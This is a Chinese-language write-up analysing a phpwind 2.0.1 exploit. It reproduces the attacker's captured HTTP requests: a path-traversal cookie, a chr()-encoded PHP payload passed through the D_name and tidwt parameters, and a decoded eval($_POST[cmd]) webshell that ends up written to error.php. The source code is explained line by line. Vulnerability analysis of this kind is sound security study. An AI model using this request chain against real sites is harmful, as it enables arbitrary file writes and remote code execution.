分析phpwind2.0.1漏洞
　　立立传给我一个 phpwind 2.0.1 的漏洞利用程序，可以直接在目录下写入一个木马（webshell）。怎么说呢，这个漏洞是 pinkeyes 发现的，本文旨在分析这个漏洞的思路。直到弄清这个漏洞是怎么产生的，我还在冒虚汗；同时 pinkeyes 的睿智深深地打动了我，我这才明白什么才是真正的技术含量。且听我慢慢道来：
　　在程序运行时，我抓了一个包（下面是其中的两个请求）：
ããGET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=
ãã(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
ããchr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).
ããchr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1
ããContent-Type: text/html
ããCookie:skinco=../../require/hidden;
ããHost: www.5a609.com:81
ããAccept: text/html, */*
ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)
ããGET /phpwind//attachment/set.php HTTP/1.1
ããContent-Type: text/html
ããCookie:skinco=../../require/hidden;
ããHost: www.5a609.com:81
ããAccept: text/html, */*
ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)
　　Chr() 里的那些东西我查了一下 ASCII 字符表，得到的是这样的：第一串 chr() 解出来是 ./error.php，第二串解出来是 <? eval($_POST[cmd]);?>。（原文这里贴出的完整 PHP 语句被网页当成标签吞掉了，只剩下一个 ?>；从上面的请求看，它是一段以 <? 开头、以 w 模式打开 ./error.php 再把第二串写进去的单行代码。用 chr() 拼字符串应是为了避开引号。另外注意写进去的木马用的是 <? 短标签，依赖 short_open_tag 开启。）
　　很显然是在 error.php 里写入一行 PHP 木马。
　　所以关键是：
　　GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt= 中 $D_name 和 $tidwt 的出处。这两个东西很重要！于是我下了一份 phpwind 2.0.1 的程序来看，开始以为是 job.php 有问题。进入 job.php，只发现如下代码：
ããelseif($previewjob=='preview'){
ããrequire_once(R_P.'require/bbscode.php');
ããrequire_once(R_P.'header.php');
ããif (empty($skin)) $skin=$db_defaultstyle;
ããif (file_exists(R_P."data/style/$skin.php")){
ããinclude_once("data/style/$skin.php");
ãã}
　　好，在失望的同时也发现 $skin 一定有问题，job.php 文件头有一句：require_once("./global.php");
　　接着我们来看看 global.php 里面的 $skin 参数吧：
ããif ($db_refreshtime!=0){
ããif('C:'.$REQUEST_URI==$lastpath && $onbbstime<$db_refreshtime){
ãã!$_COOKIE['winduid'] && $groupid='guest';
ãã$skin=$skinco ? $skinco : $db_defaultstyle;
ããShowmsg("refresh_limit");
ãã}
　　哦，只要我们定义了 $skinco 就可以满足 $skin 了！所以再找找 $skinco 吧。$skinco 只有一处相关代码，其后并没有做任何过滤：
ããif($skinco && file_exists(R_P."data/style/$skinco.php")){
ããCookie('skinco',$skinco);
　　哈哈，好轻松，只要文件存在就可以？这样只要构造一个 cookie 就完全可以实现。咦？$skinco 我们好像在哪里见过。果然，就是上面我抓的包里面的：
ããCookie:skinco=../../require/hidden;
　　这样就更加证明我的思路是正确的，真是峰回路转啊。我不得不佩服这样精彩的想法。按照 pinkeyes 的思路，构造后应该是这样的：
ããdata/style/../../require/hidden.php
　　也就是 ./require/hidden.php。（file_exists() 只验证路径是否存在，并不会拒绝 ../，所以穿越后的路径照样通过检查；唯一的限制是代码会在后面拼上 .php，被包含的文件必须以 .php 结尾。）
　　这样也就满足了 job.php 中的
ããif (file_exists(R_P."data/style/$skin.php")){
ããinclude_once("data/style/$skin.php");
　　到这里，又告一段落，我们回个头想想。我们分析了这么多，就是 pinkeyes 为了包含一个文件：./require/hidden.php。这就奇怪了，为什么 pinkeyes 要千方百计地来包含 ./require/hidden.php 呢？直接利用不可以吗？这个 hidden.php 到底是个什么样的文件呢？嗯，下面的解释会让你有一个满意的答案。
　　我小心翼翼地打开 hidden.php：
ãã
ãã// hidden.php (phpwind 2.0.1) -- updates the "online users" record file.
ãã// Guard: exits unless readover() is already defined, i.e. unless some other
ãã// script defined it before including this file. A direct request to
ãã// hidden.php therefore stops here, which is why the article reaches it
ãã// through include_once() instead.
ãã!function_exists('readover') && exit('Forbidden');
ãã// Build one record from bare globals. None of them is validated or escaped
ãã// here; in the request shown in the article $tidwt (and $D_name below)
ãã// come straight from the query string, so their content lands in the file
ãã// verbatim.
ãã// NOTE(review): the "t" and "n" separators in this listing are almost
ãã// certainly "\t" and "\n" whose backslashes were lost in transcription.
ãã$newonline="<>t$timestampt$onlineipt$fidwtt$tidwtt$groupidt$wherebbsyout$acttimet$uidt$windidt";
ãã// Pad to the fixed record width $db_olsize and terminate the line.
ãã$newonline=str_pad($newonline,$db_olsize)."n";
ãã// The record file is R_P.$D_name -- $D_name is used exactly as given, with
ãã// no check that it stays inside any particular directory.
ãã$onlineuser=readover(R_P.$D_name);
ããif($offset=strpos($onlineuser,"t".$windid."t")){
ãã// A record containing this $windid already exists: back up to the line
ãã// break that precedes it, step past it, and rewrite that record in place
ãã// (writeinline() is defined elsewhere -- presumably a write at an offset).
ãã$inselectfile='N';
ãã$offset=strpos($onlineuser,"n",$offset-$db_olsize);$offset+=1;/* original comment (garbled in transcription), roughly: after the optimisation the pointer no longer needs converting at the start */
ããwriteinline(R_P.$D_name,$newonline,$offset);
ãã}elseif($offset=strpos($onlineuser,str_pad(' ',$db_olsize)."n")){
ãã// Otherwise reuse the first all-spaces (blank) record.
ããwriteinline(R_P.$D_name,$newonline,$offset);
ãã}else{
ãã// No free record: append (mode "ab"). Whichever branch runs, $newonline --
ãã// $tidwt included -- is written to the caller-chosen path R_P.$D_name.
ããwriteover(R_P.$D_name,$newonline,"ab");
ãã}
ãã?>
　　看到这里，我所有的疑团都解开了！
　　1. 原来文件头多了一句
ãã!function_exists('readover') && exit('Forbidden');
　　这样直接访问是不允许的（没有 readover() 这个函数就直接 exit），后面的代码也不会执行。这样我就明白了 pinkeyes 的苦心：宁可多走弯路，也只好借 $skinco 的 include 来包含这个文件。
　　2. 这个文件里的 writeinline()/writeover()（原文写作 writeline()）是可以写入木马的。$newonline 正好也拼进了 $tidwt，所以最后的 writeover() 把 $tidwt 也写进去了——而写入路径 R_P.$D_name 完全由请求里的 D_name 决定，没有任何过滤，等于任意文件写。
　　写入到了 D_name 所指定的 set.php 这个临时文件里（请求里的 D_name、tidwt 直接变成了脚本里的 $D_name、$tidwt，应是当年默认开启的 register_globals 所致）。本来这样就可以写入一个小木马了，只要把 $tidwt 设成编码过的木马就行。但可能是 pinkeyes 考虑到 set.php 里写进去的东西比较乱（同一行里还拼着 $timestamp、$onlineip、$uid 等变量），所以煞费苦心地用上面那串 chr() 拼出的语句（原文贴出的语句同样被网页吞掉，只剩 ?>）
　　写入一个更简单的木马到 error.php 里！这样才多了我们抓的第二个包——直接请求刚写入的 set.php，让其中那行 PHP 执行，从而生成 error.php：
ããGET /phpwind//attachment/set.php HTTP/1.1
ããããããããããã
　　后记：我感觉自己像把侦探小说过了一遍，是不是啊，呵呵……
（本文由责任编辑 pasu 整理发布）